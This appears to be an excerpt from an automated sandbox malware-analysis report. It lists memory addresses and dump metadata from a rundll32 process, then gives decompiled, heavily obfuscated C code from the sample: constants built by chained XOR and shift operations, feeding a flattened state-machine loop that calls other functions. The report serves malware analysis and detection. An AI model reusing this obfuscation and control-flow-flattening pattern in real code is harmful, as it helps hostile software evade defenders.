                                                                                                                    0x00345608
                                                                                                                    0x00345613
                                                                                                                    0x0034561e
                                                                                                                    0x00345629
                                                                                                                    0x00345634
                                                                                                                    0x0034563f
                                                                                                                    0x0034564a
                                                                                                                    0x0034565a
                                                                                                                    0x00345661
                                                                                                                    0x0034566c
                                                                                                                    0x00345677
                                                                                                                    0x0034567f
                                                                                                                    0x0034568a
                                                                                                                    0x00345695
                                                                                                                    0x003456a8
                                                                                                                    0x003456af
                                                                                                                    0x003456ba
                                                                                                                    0x003456c2
                                                                                                                    0x003456d0
                                                                                                                    0x003456d4
                                                                                                                    0x003456dc
                                                                                                                    0x003456e4
                                                                                                                    0x003456ec
                                                                                                                    0x003456f1
                                                                                                                    0x003456f9
                                                                                                                    0x00345709
                                                                                                                    0x0034570e
                                                                                                                    0x00345715
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x0034571c
                                                                                                                    0x0034571c
                                                                                                                    0x0034571c
                                                                                                                    0x0034571c
                                                                                                                    0x00345722
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00345a30
                                                                                                                    0x00345a36
                                                                                                                    0x00345ac0
                                                                                                                    0x00345ace
                                                                                                                    0x00345ad0
                                                                                                                    0x00345ad1
                                                                                                                    0x00345ad3
                                                                                                                    0x00345ad5
                                                                                                                    0x00345ae0
                                                                                                                    0x00345ae7
                                                                                                                    0x00345ae8
                                                                                                                    0x00345aed
                                                                                                                    0x00345af0
                                                                                                                    0x00345af5
                                                                                                                    0x00000000
                                                                                                                    0x00345a3c
                                                                                                                    0x00345a3c
                                                                                                                    0x00345a42
                                                                                                                    0x00345a9b
                                                                                                                    0x00345aa2
                                                                                                                    0x00345aa7
                                                                                                                    0x00345aa9
                                                                                                                    0x00345aac
                                                                                                                    0x00345ab3
                                                                                                                    0x00345ab8
                                                                                                                    0x00000000
                                                                                                                    0x00345a44
                                                                                                                    0x00345a44
                                                                                                                    0x00345a4a
                                                                                                                    0x00000000
                                                                                                                    0x00345b2d
                                                                                                                    0x00345a50
                                                                                                                    0x00345a56
                                                                                                                    0x00000000
                                                                                                                    0x00345a5c
                                                                                                                    0x00345a6b
                                                                                                                    0x00345a70
                                                                                                                    0x00345a71
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00000000
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00345a56
                                                                                                                    0x00345a42
                                                                                                                    0x00345b3a
                                                                                                                    0x00345b3a
                                                                                                                    0x00345b3a
                                                                                                                    0x00345728
                                                                                                                    0x00345a20
                                                                                                                    0x00345a25
                                                                                                                    0x00345a26
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00000000
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00345734
                                                                                                                    0x003459ce
                                                                                                                    0x003459dc
                                                                                                                    0x003459e3
                                                                                                                    0x003459ee
                                                                                                                    0x003459f8
                                                                                                                    0x003459f9
                                                                                                                    0x003459fe
                                                                                                                    0x00345a01
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00000000
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00345740
                                                                                                                    0x00345948
                                                                                                                    0x0034597a
                                                                                                                    0x003459ad
                                                                                                                    0x003459b4
                                                                                                                    0x003459b9
                                                                                                                    0x003459bc
                                                                                                                    0x003459be
                                                                                                                    0x003459c4
                                                                                                                    0x00000000
                                                                                                                    0x003459c4
                                                                                                                    0x00345746
                                                                                                                    0x0034574c
                                                                                                                    0x0034584c
                                                                                                                    0x00345889
                                                                                                                    0x00345890
                                                                                                                    0x00345895
                                                                                                                    0x0034589e
                                                                                                                    0x003458e5
                                                                                                                    0x003458f4
                                                                                                                    0x00345918
                                                                                                                    0x0034591c
                                                                                                                    0x00345921
                                                                                                                    0x00345924
                                                                                                                    0x00345926
                                                                                                                    0x0034592c
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00000000
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00345752
                                                                                                                    0x00345758
                                                                                                                    0x003457f8
                                                                                                                    0x0034580d
                                                                                                                    0x00345812
                                                                                                                    0x00345817
                                                                                                                    0x0034581f
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00000000
                                                                                                                    0x00345717
                                                                                                                    0x0034575e
                                                                                                                    0x0034575e
                                                                                                                    0x00345760
                                                                                                                    0x00000000
                                                                                                                    0x00345766
                                                                                                                    0x00345766
                                                                                                                    0x0034576f
                                                                                                                    0x0034577a
                                                                                                                    0x00345780
                                                                                                                    0x003457ba
                                                                                                                    0x003457bf
                                                                                                                    0x003457d2
                                                                                                                    0x003457d7
                                                                                                                    0x003457d8
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00000000
                                                                                                                    0x00345717
                                                                                                                    0x00345717
                                                                                                                    0x00345760
                                                                                                                    0x00345758
                                                                                                                    0x0034574c
                                                                                                                    0x00000000
                                                                                                                    0x00345afa
                                                                                                                    0x00345afa
                                                                                                                    0x00345afa
                                                                                                                    0x00000000
                                                                                                                    0x0034571c

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$noz$~wP`$!=$'$zQ5
                                                                                                                    • API String ID: 1514166925-3442493123
                                                                                                                    • Opcode ID: 0b3b6c2e372957a82da72871aa8244d8bd81b2c01920e019625259ec04cc01fb
                                                                                                                    • Instruction ID: b303a48df4ac2ed9e166ac3819f12d96a927d0752844a4222b4c4038e3f4b99f
                                                                                                                    • Opcode Fuzzy Hash: 0b3b6c2e372957a82da72871aa8244d8bd81b2c01920e019625259ec04cc01fb
                                                                                                                    • Instruction Fuzzy Hash: 1572F0714083819FD3B9CF25C58AB9BBBE1BBC4318F108A1DE1DA96260D7B49949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00342550 Relevance: 21.1, Strings: 16, Instructions: 1077COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00342550() {
				signed int _v28;
				char _v36;
				char _v84;
				signed int _v100;
				signed int _v104;
				signed int _v112;
				signed int _v124;
				signed int _v140;
				intOrPtr _v144;
				char _v152;
				signed int _v172;
				char _v180;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				unsigned int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				unsigned int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _t1114;
				signed int _t1118;
				signed int _t1122;
				signed int _t1124;
				signed int _t1125;
				signed int _t1130;
				void* _t1134;
				signed int _t1141;
				signed int _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1313;
				signed int _t1314;
				signed int _t1317;
				signed int _t1343;
				void* _t1345;
				void* _t1348;
				void* _t1349;
				void* _t1350;

				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
				_v372 = 0xaca17;
				_v372 = _v372 << 9;
				_v372 = _v372 ^ 0xc9927700;
				_v372 = _v372 ^ 0xdc065802;
				_v560 = 0xa158a0;
				_v560 = _v560 + 0xffff5dcd;
				_v560 = _v560 ^ 0x175bafac;
				_v560 = _v560 + 0xffff9e49;
				_v560 = _v560 ^ 0x17fab80a;
				_v288 = 0xd4a9a6;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x001a9534;
				_v504 = 0xe9a5d3;
				_v504 = _v504 << 0xa;
				_v504 = _v504 | 0xea5982c0;
				_t1190 = 0x5f;
				_v504 = _v504 / _t1190;
				_v504 = _v504 ^ 0x028f5db6;
				_t1317 = 0x5d794ec;
				_v304 = 0x85b0a3;
				_v304 = _v304 | 0x2bca024a;
				_v304 = _v304 ^ 0x2bcc012b;
				_v556 = 0x1ecc82;
				_v556 = _v556 | 0xf08df0d8;
				_v556 = _v556 + 0xa531;
				_v556 = _v556 ^ 0xfe698427;
				_v556 = _v556 ^ 0x0ecdaa65;
				_v300 = 0x8f610e;
				_v300 = _v300 + 0xfe33;
				_v300 = _v300 ^ 0x0094e207;
				_v600 = 0x1cab4a;
				_t1193 = 0x18;
				_v600 = _v600 / _t1193;
				_v600 = _v600 + 0xffff3801;
				_v600 = _v600 + 0x515c;
				_v600 = _v600 ^ 0x0001e7c9;
				_v568 = 0xbab742;
				_v568 = _v568 + 0xcc5d;
				_v568 = _v568 | 0x5c48aa02;
				_t1194 = 0x5e;
				_v568 = _v568 / _t1194;
				_v568 = _v568 ^ 0x00f9db2d;
				_v576 = 0x767b63;
				_v576 = _v576 >> 3;
				_v576 = _v576 + 0xd487;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 ^ 0x00061026;
				_v628 = 0xe4759e;
				_v628 = _v628 ^ 0xa26bb658;
				_v628 = _v628 * 0x1d;
				_v628 = _v628 ^ 0xba259216;
				_v628 = _v628 ^ 0xd068fc76;
				_v500 = 0xe51d81;
				_v500 = _v500 >> 7;
				_v500 = _v500 + 0xc085;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 ^ 0x01113a52;
				_v512 = 0xc902c8;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 7;
				_v512 = _v512 ^ 0x0003c164;
				_v532 = 0xda62af;
				_v532 = _v532 ^ 0x7c695b99;
				_v532 = _v532 >> 0xd;
				_v532 = _v532 >> 6;
				_v532 = _v532 ^ 0x0009f043;
				_v604 = 0x69f539;
				_v604 = _v604 << 0xd;
				_v604 = _v604 + 0xffffd530;
				_v604 = _v604 + 0xffffaf77;
				_v604 = _v604 ^ 0x3ead80db;
				_v384 = 0xab9f19;
				_t1195 = 0xf;
				_t1313 = 0x50;
				_v384 = _v384 * 0x15;
				_v384 = _v384 * 9;
				_v384 = _v384 ^ 0x7eb18135;
				_v256 = 0xb5a6bd;
				_v256 = _v256 | 0x1f71a96d;
				_v256 = _v256 ^ 0x1ffe1878;
				_v264 = 0xca80f7;
				_v264 = _v264 ^ 0x226a3f90;
				_v264 = _v264 ^ 0x22af4e12;
				_v432 = 0x1b5a57;
				_v432 = _v432 << 0xa;
				_v432 = _v432 | 0x8c1547fb;
				_v432 = _v432 ^ 0xed77fd98;
				_v312 = 0xf59d00;
				_v312 = _v312 | 0xee7978e1;
				_v312 = _v312 ^ 0xeef23383;
				_v608 = 0x388a49;
				_v608 = _v608 ^ 0x20b0147d;
				_v608 = _v608 | 0x120a0452;
				_v608 = _v608 / _t1195;
				_v608 = _v608 ^ 0x035d442e;
				_v632 = 0x8bfb5e;
				_v632 = _v632 / _t1313;
				_v632 = _v632 | 0x8005d6ab;
				_v632 = _v632 + 0xbf6f;
				_v632 = _v632 ^ 0x80035879;
				_v624 = 0xe5ec6;
				_v624 = _v624 << 2;
				_v624 = _v624 >> 9;
				_v624 = _v624 | 0xadaec6d6;
				_v624 = _v624 ^ 0xada90310;
				_v392 = 0x144ef;
				_t1196 = 0x44;
				_v392 = _v392 / _t1196;
				_v392 = _v392 + 0xc90b;
				_v392 = _v392 ^ 0x0000cf97;
				_v236 = 0xf3d10d;
				_t1197 = 0x4a;
				_v236 = _v236 * 0x7a;
				_v236 = _v236 ^ 0x74330487;
				_v324 = 0xc3c34b;
				_v324 = _v324 * 0x6c;
				_v324 = _v324 ^ 0x529af392;
				_v520 = 0x2a70ca;
				_v520 = _v520 / _t1197;
				_v520 = _v520 >> 4;
				_v520 = _v520 ^ 0x2a4d5a72;
				_v520 = _v520 ^ 0x2a4dbf28;
				_v340 = 0xc9c056;
				_t1198 = 7;
				_v340 = _v340 * 0x23;
				_v340 = _v340 | 0xe2238341;
				_v340 = _v340 ^ 0xfbb710ef;
				_v248 = 0x9a54c0;
				_v248 = _v248 | 0xe08ac880;
				_v248 = _v248 ^ 0xe09bcbd4;
				_v348 = 0xe0760;
				_v348 = _v348 << 7;
				_v348 = _v348 + 0x49a3;
				_v348 = _v348 ^ 0x070edb7d;
				_v356 = 0xf94015;
				_v356 = _v356 * 0x4d;
				_v356 = _v356 << 1;
				_v356 = _v356 ^ 0x95f7b4be;
				_v320 = 0x1268a5;
				_v320 = _v320 / _t1198;
				_v320 = _v320 ^ 0x00080ceb;
				_v396 = 0xbdcf3e;
				_t1199 = 0x4b;
				_v396 = _v396 * 0x4d;
				_v396 = _v396 >> 2;
				_v396 = _v396 ^ 0x0e48dd39;
				_v596 = 0x7780dd;
				_v596 = _v596 << 0xd;
				_v596 = _v596 | 0xdff7e7fd;
				_v596 = _v596 ^ 0xfff000ad;
				_v492 = 0x5c66b3;
				_v492 = _v492 * 0x2a;
				_v492 = _v492 ^ 0xe8f32aee;
				_v492 = _v492 >> 0xd;
				_v492 = _v492 ^ 0x000eb956;
				_v316 = 0x3e4fae;
				_v316 = _v316 >> 3;
				_v316 = _v316 ^ 0x00075837;
				_v344 = 0xe0dcd8;
				_v344 = _v344 >> 1;
				_v344 = _v344 + 0xffff4400;
				_v344 = _v344 ^ 0x0066aca9;
				_v460 = 0xbe16e8;
				_v460 = _v460 * 0x45;
				_v460 = _v460 ^ 0x56f71a5b;
				_v460 = _v460 / _t1199;
				_v460 = _v460 ^ 0x0158823c;
				_v588 = 0x54b44f;
				_v588 = _v588 ^ 0xc5cf08f3;
				_v588 = _v588 ^ 0x4b1db793;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x00183ace;
				_v524 = 0xbfc9bb;
				_t1200 = 0x67;
				_v524 = _v524 * 0x4d;
				_v524 = _v524 * 0x71;
				_v524 = _v524 << 1;
				_v524 = _v524 ^ 0xed1ab829;
				_v376 = 0x55c29;
				_v376 = _v376 << 0xc;
				_v376 = _v376 ^ 0xdae248eb;
				_v376 = _v376 ^ 0x8f2c7d73;
				_v424 = 0x330008;
				_v424 = _v424 << 0xb;
				_v424 = _v424 / _t1200;
				_v424 = _v424 ^ 0x017d7462;
				_v580 = 0xb4c97;
				_v580 = _v580 | 0x569d8b1e;
				_v580 = _v580 >> 1;
				_t1201 = 3;
				_v580 = _v580 / _t1201;
				_v580 = _v580 ^ 0x0e68230a;
				_v328 = 0x695dff;
				_v328 = _v328 ^ 0x424f14af;
				_v328 = _v328 ^ 0x4224025c;
				_v284 = 0xae8351;
				_t1202 = 0x57;
				_v284 = _v284 * 0x60;
				_v284 = _v284 ^ 0x417e5081;
				_v444 = 0x78eba1;
				_v444 = _v444 * 0x5f;
				_v444 = _v444 ^ 0x00193e0b;
				_v444 = _v444 ^ 0x2cc98685;
				_v592 = 0x15a443;
				_v592 = _v592 / _t1202;
				_v592 = _v592 + 0xffff9c6f;
				_v592 = _v592 >> 5;
				_v592 = _v592 ^ 0x07f20231;
				_v216 = 0x5d0672;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x02ee7d7e;
				_v548 = 0xb50861;
				_v548 = _v548 >> 0xc;
				_v548 = _v548 << 0xf;
				_v548 = _v548 + 0xffffef54;
				_v548 = _v548 ^ 0x05ac6923;
				_v452 = 0x2163b6;
				_v452 = _v452 | 0xbb60e7c3;
				_v452 = _v452 ^ 0x0d3b8c6d;
				_v452 = _v452 ^ 0xb65710e5;
				_v636 = 0x61f3a7;
				_v636 = _v636 + 0xffff300f;
				_v636 = _v636 << 1;
				_v636 = _v636 * 0x27;
				_v636 = _v636 ^ 0x1d9bc7e7;
				_v224 = 0x725254;
				_v224 = _v224 + 0xfffffac1;
				_v224 = _v224 ^ 0x007e9bc6;
				_v228 = 0xd6200c;
				_v228 = _v228 ^ 0x5ef32346;
				_v228 = _v228 ^ 0x5e2a0e2d;
				_v540 = 0xc12668;
				_v540 = _v540 << 8;
				_v540 = _v540 * 0x51;
				_v540 = _v540 + 0xffff6981;
				_v540 = _v540 ^ 0x1d2c502d;
				_v496 = 0x68726f;
				_v496 = _v496 + 0xb8c4;
				_v496 = _v496 + 0xffff3269;
				_v496 = _v496 << 1;
				_v496 = _v496 ^ 0x00d37668;
				_v296 = 0x65f16b;
				_v296 = _v296 ^ 0xac840f83;
				_v296 = _v296 ^ 0xace8f4ad;
				_v336 = 0xf34185;
				_v336 = _v336 + 0xffff7084;
				_v336 = _v336 ^ 0x22f89925;
				_v336 = _v336 ^ 0x2207d32f;
				_v400 = 0x9220b0;
				_v400 = _v400 | 0xa2c46701;
				_v400 = _v400 + 0x1a14;
				_v400 = _v400 ^ 0xa2d5ce26;
				_v368 = 0x18190f;
				_v368 = _v368 * 0x6c;
				_t1203 = 0x47;
				_v368 = _v368 * 0x49;
				_v368 = _v368 ^ 0xe62bbbec;
				_v276 = 0x664929;
				_v276 = _v276 + 0xffffab3c;
				_v276 = _v276 ^ 0x0066f8be;
				_v420 = 0x55fac4;
				_v420 = _v420 / _t1203;
				_v420 = _v420 | 0x23698c02;
				_v420 = _v420 ^ 0x23676b12;
				_v428 = 0x2d8f3d;
				_v428 = _v428 ^ 0xcbbc8554;
				_v428 = _v428 + 0xffff5f5b;
				_v428 = _v428 ^ 0xcb969d3b;
				_v408 = 0x7d0ed3;
				_t1204 = 0x33;
				_v408 = _v408 / _t1204;
				_v408 = _v408 ^ 0x03ccba73;
				_v408 = _v408 ^ 0x03c41a74;
				_v212 = 0xf1bcf;
				_v212 = _v212 | 0xafbe7d4b;
				_v212 = _v212 ^ 0xafbe5483;
				_v476 = 0x76a0ac;
				_v476 = _v476 << 0xa;
				_v476 = _v476 << 2;
				_v476 = _v476 >> 6;
				_v476 = _v476 ^ 0x01aadd1c;
				_v252 = 0xacd74c;
				_v252 = _v252 + 0xffffc13c;
				_v252 = _v252 ^ 0x00a0cd5e;
				_v232 = 0x48ff42;
				_t1205 = 0x1a;
				_v232 = _v232 / _t1205;
				_v232 = _v232 ^ 0x0005b06f;
				_v620 = 0x68b0f8;
				_v620 = _v620 | 0x9e72bceb;
				_v620 = _v620 ^ 0x53ebce50;
				_v620 = _v620 + 0x60e9;
				_v620 = _v620 ^ 0xcd9386df;
				_v572 = 0xa5dd6d;
				_v572 = _v572 << 0xb;
				_t1206 = 0x6b;
				_v572 = _v572 / _t1206;
				_v572 = _v572 + 0xe547;
				_v572 = _v572 ^ 0x00701f50;
				_v516 = 0x27ee1e;
				_v516 = _v516 + 0x5114;
				_v516 = _v516 ^ 0xd07a9b41;
				_v516 = _v516 ^ 0x4a8a2a52;
				_v516 = _v516 ^ 0x9ad4de84;
				_v484 = 0xc04b63;
				_v484 = _v484 >> 3;
				_v484 = _v484 >> 4;
				_v484 = _v484 + 0xffff6956;
				_v484 = _v484 ^ 0x000f5fa9;
				_v416 = 0x10eb88;
				_v416 = _v416 | 0xd8fa91ef;
				_v416 = _v416 ^ 0xf957ef44;
				_v416 = _v416 ^ 0x21a34ff6;
				_v412 = 0xf4f2f5;
				_v412 = _v412 + 0xffff8ffc;
				_v412 = _v412 + 0xffff7090;
				_v412 = _v412 ^ 0x00f029cf;
				_v268 = 0xc7943e;
				_v268 = _v268 << 0x10;
				_v268 = _v268 ^ 0x94371f3e;
				_v544 = 0x509d95;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 >> 0xf;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 ^ 0x0008d406;
				_v552 = 0x34f7be;
				_v552 = _v552 / _t1190;
				_v552 = _v552 >> 0x10;
				_v552 = _v552 >> 5;
				_v552 = _v552 ^ 0x0008c95b;
				_v404 = 0x94eb91;
				_v404 = _v404 ^ 0x41984e3b;
				_v404 = _v404 << 3;
				_v404 = _v404 ^ 0x08661611;
				_v220 = 0x500384;
				_v220 = _v220 ^ 0xbbdae5ed;
				_v220 = _v220 ^ 0xbb8779fc;
				_v448 = 0x89f4a;
				_t1207 = 0x66;
				_v448 = _v448 * 0x78;
				_v448 = _v448 / _t1313;
				_v448 = _v448 ^ 0x000df59a;
				_v292 = 0x19f8d0;
				_v292 = _v292 >> 0xf;
				_v292 = _v292 ^ 0x0007f69a;
				_v616 = 0x49d3c1;
				_v616 = _v616 | 0x94d46b10;
				_v616 = _v616 >> 0xe;
				_v616 = _v616 | 0x382c489e;
				_v616 = _v616 ^ 0x382cb35c;
				_v440 = 0x57429d;
				_v440 = _v440 << 0x10;
				_v440 = _v440 + 0x8d95;
				_v440 = _v440 ^ 0x429b4669;
				_v612 = 0x469ad0;
				_v612 = _v612 ^ 0xa9c1a766;
				_v612 = _v612 | 0x8fd1d886;
				_v612 = _v612 << 1;
				_v612 = _v612 ^ 0x5faedd57;
				_v244 = 0xe276bf;
				_v244 = _v244 * 0x1a;
				_v244 = _v244 ^ 0x170afa50;
				_v352 = 0x60bcf5;
				_v352 = _v352 + 0xf9c7;
				_v352 = _v352 ^ 0xebf612c1;
				_v352 = _v352 ^ 0xeb9276cf;
				_v488 = 0xa1517b;
				_v488 = _v488 / _t1207;
				_t1208 = 0x68;
				_v488 = _v488 * 0x65;
				_v488 = _v488 >> 0xc;
				_v488 = _v488 ^ 0x00034996;
				_v388 = 0x73cbfd;
				_v388 = _v388 << 5;
				_v388 = _v388 / _t1208;
				_v388 = _v388 ^ 0x002375e2;
				_v480 = 0x418d4e;
				_v480 = _v480 + 0xffffa3b5;
				_v480 = _v480 + 0x7686;
				_v480 = _v480 << 6;
				_v480 = _v480 ^ 0x106d4c13;
				_v380 = 0xc2a320;
				_t1209 = 0x12;
				_v380 = _v380 / _t1209;
				_t1210 = 0x3b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x02970ee8;
				_v272 = 0xffa302;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0xfd1abd55;
				_v280 = 0x15da71;
				_v280 = _v280 | 0xb4bf3799;
				_v280 = _v280 ^ 0xb4b9b38f;
				_v364 = 0xb2440c;
				_v364 = _v364 >> 0xb;
				_v364 = _v364 ^ 0x4809a963;
				_v364 = _v364 ^ 0x4806c3ec;
				_v472 = 0xfa5982;
				_v472 = _v472 * 0x42;
				_v472 = _v472 | 0xea19613e;
				_v472 = _v472 + 0x3c8a;
				_v472 = _v472 ^ 0xea9293e6;
				_v464 = 0xd5ed68;
				_v464 = _v464 << 3;
				_v464 = _v464 << 0x10;
				_v464 = _v464 << 0xc;
				_v464 = _v464 ^ 0x00064bb9;
				_v240 = 0xe6b6f4;
				_v240 = _v240 + 0xffffaad8;
				_v240 = _v240 ^ 0x00e3249b;
				_v360 = 0x591b06;
				_v360 = _v360 / _t1210;
				_v360 = _v360 ^ 0x000e8e51;
				_v456 = 0xd9b586;
				_v456 = _v456 << 7;
				_t1211 = 0x77;
				_v456 = _v456 / _t1211;
				_v456 = _v456 ^ 0x2d3aa422;
				_v456 = _v456 ^ 0x2dd2b0e0;
				_v468 = 0xee071b;
				_t1212 = 0x17;
				_v468 = _v468 / _t1212;
				_v468 = _v468 + 0xffff215c;
				_t1213 = 0x1e;
				_v468 = _v468 / _t1213;
				_v468 = _v468 ^ 0x01343549;
				_v508 = 0x51d736;
				_v508 = _v508 ^ 0xe0f7e333;
				_v508 = _v508 ^ 0x46175d01;
				_v508 = _v508 << 0xb;
				_v508 = _v508 ^ 0x8b480710;
				_v332 = 0x8a6fa0;
				_v332 = _v332 << 4;
				_v332 = _v332 * 0x66;
				_v332 = _v332 ^ 0x72879c01;
				_v436 = 0x22afa8;
				_v436 = _v436 ^ 0xb7db44c6;
				_v436 = _v436 + 0x54fa;
				_v436 = _v436 ^ 0xb7fa4fc8;
				_v584 = 0x2b296e;
				_t833 =  &_v584; // 0x2b296e
				_t1214 = 0x7d;
				_t1314 = _v360;
				_v584 =  *_t833 * 0x69;
				_v584 = _v584 ^ 0x4f8ca6ed;
				_v584 = _v584 + 0xffff6423;
				_v584 = _v584 ^ 0x5e3ea256;
				_v564 = 0x8d053b;
				_t1191 = _v360;
				_v564 = _v564 * 0x58;
				_v564 = _v564 >> 0xa;
				_v564 = _v564 / _t1214;
				_v564 = _v564 ^ 0x000da371;
				_v208 = 0xe7280f;
				_v208 = _v208 << 4;
				_v208 = _v208 ^ 0x0e7f3b50;
				_v308 = 0xd716a5;
				_v308 = _v308 << 6;
				_v308 = _v308 ^ 0x35cb5d60;
				_v260 = 0x2bcd88;
				_t1215 = 0x69;
				_v260 = _v260 * 0x56;
				_v260 = _v260 ^ 0x0eb9ff90;
				_v536 = 0x561f85;
				_v536 = _v536 + 0x28c2;
				_v536 = _v536 ^ 0x7eb81cd4;
				_v536 = _v536 + 0xfffffcfb;
				_v536 = _v536 ^ 0x7eee24be;
				_v528 = 0xd9e61a;
				_v528 = _v528 | 0x5cf69c57;
				_v528 = _v528 / _t1215;
				_v528 = _v528 * 0x70;
				_v528 = _v528 ^ 0x6333db70;
				goto L1;
				do {
					while(1) {
						L1:
						_t1348 = _t1317 - 0x6397bd0;
						if(_t1348 > 0) {
							break;
						}
						if(_t1348 == 0) {
							E003466CA();
							_t1317 = 0x525d695;
							continue;
						}
						_t1349 = _t1317 - 0x3d71c3c;
						if(_t1349 > 0) {
							__eflags = _t1317 - 0x525d695;
							if(__eflags > 0) {
								__eflags = _t1317 - 0x53c3717;
								if(_t1317 == 0x53c3717) {
									_t1118 = E00341FFB();
									__eflags = _t1118;
									if(_t1118 == 0) {
										_t1125 = E00350056();
									}
									L27:
									_t1317 = 0xc4dcd;
									continue;
								}
								__eflags = _t1317 - 0x56efd44;
								if(_t1317 == 0x56efd44) {
									E003495FA();
									_t1122 = E00341FFB();
									asm("sbb esi, esi");
									_t1317 = ( ~_t1122 & 0xfebaa250) + 0x8c1c67e;
									continue;
								}
								__eflags = _t1317 - 0x5d794ec;
								if(_t1317 == 0x5d794ec) {
									_t1317 = 0xd7f216f;
									continue;
								}
								__eflags = _t1317 - 0x5dcd6da;
								if(_t1317 != 0x5dcd6da) {
									goto L109;
								}
								_t1125 = E0034C110(_v336,  &_v152, _v400, _v368);
								_t1317 = 0x6eeee91;
								continue;
							}
							if(__eflags == 0) {
								_t1125 = E003359F2();
								__eflags = _t1125;
								if(_t1125 == 0) {
									L114:
									return _t1125;
								}
								_t1317 = 0x56efd44;
								continue;
							}
							__eflags = _t1317 - 0x3fc5519;
							if(_t1317 == 0x3fc5519) {
								_v144 = E003420B0();
								_t1125 = E00341DDD(_v452, _t1152, _v636, _v224);
								_pop(_t1237);
								_v140 = _t1125;
								_t1317 = 0xa74297b;
								continue;
							}
							__eflags = _t1317 - 0x42dc4f0;
							if(_t1317 == 0x42dc4f0) {
								_t1125 = _v468;
								_t1317 = 0x4cdd8ae;
								_v112 = _t1125;
								continue;
							}
							__eflags = _t1317 - 0x4a24b69;
							if(_t1317 == 0x4a24b69) {
								_t1125 = E00340326();
								_t1317 = 0x8690ed6;
								continue;
							}
							__eflags = _t1317 - 0x4cdd8ae;
							if(_t1317 != 0x4cdd8ae) {
								goto L109;
							}
							_t1125 = _v508;
							_t1317 = 0x5dcd6da;
							_v124 = _t1125;
							continue;
						}
